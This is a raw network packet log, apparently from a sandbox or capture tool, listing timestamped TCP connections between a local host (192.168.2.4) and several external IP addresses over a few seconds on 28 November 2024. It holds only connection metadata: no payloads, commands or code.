                                                                                                                                          Nov 28, 2024 11:32:19.440638065 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.441597939 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.441663980 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.443871975 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.443938971 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.444024086 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.444030046 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.485738039 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.568650961 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:19.568665981 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.568723917 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:19.568936110 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:19.568948030 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.695667028 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.695708036 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.695745945 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.695766926 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.695782900 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.695820093 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.695821047 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.695827961 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.695875883 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.703963041 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.712340117 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.712383986 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.712397099 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.712407112 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.712445974 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.721220016 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.732955933 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.736154079 CET49773443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:19.736172915 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.737186909 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.737255096 CET49773443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:19.748184919 CET49773443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:19.748265982 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.752342939 CET49773443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:19.752357006 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.775962114 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.807199955 CET49773443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:19.817224026 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.818845034 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.869694948 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.869707108 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.873332977 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.873341084 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.891325951 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.891390085 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.891400099 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.895044088 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.895113945 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.895121098 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.900779963 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.900834084 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.900845051 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.900851965 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.900891066 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.908746004 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.911793947 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.911803961 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.911874056 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.911880970 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.916743040 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.916800976 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.916807890 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.924801111 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.924861908 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.924869061 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.928708076 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.928714991 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.928785086 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:19.928792953 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.932812929 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.932871103 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.932879925 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.940866947 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.940926075 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.940932989 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.948843002 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.948894024 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.948903084 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.956789017 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.956835032 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.956842899 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.961345911 CET49754443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:19.961354017 CET4434975420.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.961375952 CET49754443192.168.2.420.109.210.53
                                                                                                                                          Nov 28, 2024 11:32:19.961380005 CET4434975420.109.210.53192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.969837904 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.969870090 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.969877958 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.969886065 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.969926119 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.975984097 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.982423067 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.982480049 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:19.982487917 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:19.994961023 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:20.019992113 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.020003080 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.020055056 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:20.020062923 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.020142078 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.020183086 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:20.020380020 CET49770443192.168.2.454.226.114.88
                                                                                                                                          Nov 28, 2024 11:32:20.020384073 CET4434977054.226.114.88192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.024306059 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:20.079250097 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.081361055 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.081423998 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:20.081433058 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.081476927 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.081518888 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:20.095736027 CET49766443192.168.2.4104.18.11.207
                                                                                                                                          Nov 28, 2024 11:32:20.095752001 CET44349766104.18.11.207192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.140002966 CET4972380192.168.2.493.184.221.240
                                                                                                                                          Nov 28, 2024 11:32:20.201849937 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.201936960 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.201983929 CET49773443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:20.212167978 CET49773443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:20.212178946 CET4434977334.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.260586977 CET804972393.184.221.240192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.260636091 CET4972380192.168.2.493.184.221.240
                                                                                                                                          Nov 28, 2024 11:32:20.355804920 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:20.355818033 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.355875015 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:20.356108904 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:20.356121063 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.357907057 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:20.357938051 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:20.357994080 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:20.358155966 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:20.358167887 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.350095034 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.350430012 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:21.350441933 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.351944923 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.352035046 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:21.352339029 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:21.352412939 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.352464914 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:21.352471113 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.401796103 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:21.614351034 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.614639997 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:21.614653111 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.615685940 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.615788937 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:21.616084099 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:21.616163015 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.616257906 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:21.616262913 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.622179031 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.623334885 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:21.623358011 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.624368906 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.624428988 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:21.625623941 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:21.625689030 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.625921965 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:21.625929117 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:21.667438984 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:21.667556047 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:21.998261929 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.029006958 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.029020071 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.029058933 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.029109001 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:22.029133081 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.029149055 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:22.029160023 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.029211998 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:22.030162096 CET49774443192.168.2.413.227.8.47
                                                                                                                                          Nov 28, 2024 11:32:22.030177116 CET4434977413.227.8.47192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.086628914 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.086730003 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.086807966 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:22.087575912 CET49777443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:22.087594986 CET4434977734.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.251586914 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.251776934 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.251826048 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:22.254749060 CET49776443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:22.254766941 CET443497768.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.394336939 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.394424915 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:22.417943954 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:22.417964935 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.418198109 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.428859949 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:22.453644037 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:22.453675032 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.453737020 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:22.456875086 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:22.456887960 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.471342087 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.558160067 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:22.558198929 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:22.558260918 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:22.558465004 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:22.558478117 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.718146086 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.718487978 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:23.718516111 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.719537020 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.719609022 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:23.719947100 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:23.720005989 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.720087051 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:23.720093966 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.760425091 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:23.906336069 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.906420946 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.906474113 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:23.907236099 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:23.907248974 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.907262087 CET49742443192.168.2.423.218.208.109
                                                                                                                                          Nov 28, 2024 11:32:23.907269001 CET4434974223.218.208.109192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.925232887 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.925518036 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:23.925533056 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.926597118 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.926659107 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:23.927727938 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:23.927788019 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.927984953 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:23.927992105 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.928003073 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:23.975341082 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:23.979163885 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:24.284300089 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.284420967 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.284467936 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:24.285164118 CET49778443192.168.2.48.8.8.8
                                                                                                                                          Nov 28, 2024 11:32:24.285181999 CET443497788.8.8.8192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.586810112 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.589214087 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.589257002 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:24.589847088 CET49779443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:24.589864969 CET44349779149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.811005116 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:24.811049938 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:24.811134100 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:24.811335087 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:24.811352015 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.223642111 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.223895073 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.223910093 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.225280046 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.225342989 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.225672007 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.225743055 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.225809097 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.267345905 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.278501034 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.278517008 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.323225021 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.745428085 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.745527029 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:26.746696949 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.746891022 CET49781443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:26.746911049 CET44349781149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:33.156888962 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:33.156943083 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:33.157053947 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:33.157263041 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:33.157280922 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.415357113 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.415647984 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.415687084 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.416040897 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.416352987 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.416413069 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.416481972 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.459335089 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.888813019 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.888902903 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.888959885 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.890444994 CET49782443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.890467882 CET4434978234.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.895091057 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:34.895116091 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.895188093 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:34.895438910 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:34.895450115 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.900043964 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.900084972 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:34.900161982 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.900316954 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:34.900326967 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.164184093 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.164545059 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:36.164581060 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.164952993 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.165327072 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:36.165395021 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.165455103 CET49784443192.168.2.434.117.59.81
                                                                                                                                          Nov 28, 2024 11:32:36.211329937 CET4434978434.117.59.81192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.355779886 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.356025934 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:36.356044054 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.356400967 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.357006073 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:36.357073069 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.357342005 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:36.357374907 CET49783443192.168.2.4149.154.167.220
                                                                                                                                          Nov 28, 2024 11:32:36.357379913 CET44349783149.154.167.220192.168.2.4
                                                                                                                                          Nov 28, 2024 11:32:36.637753963 CET4434978434.117.59.81192.168.2.4
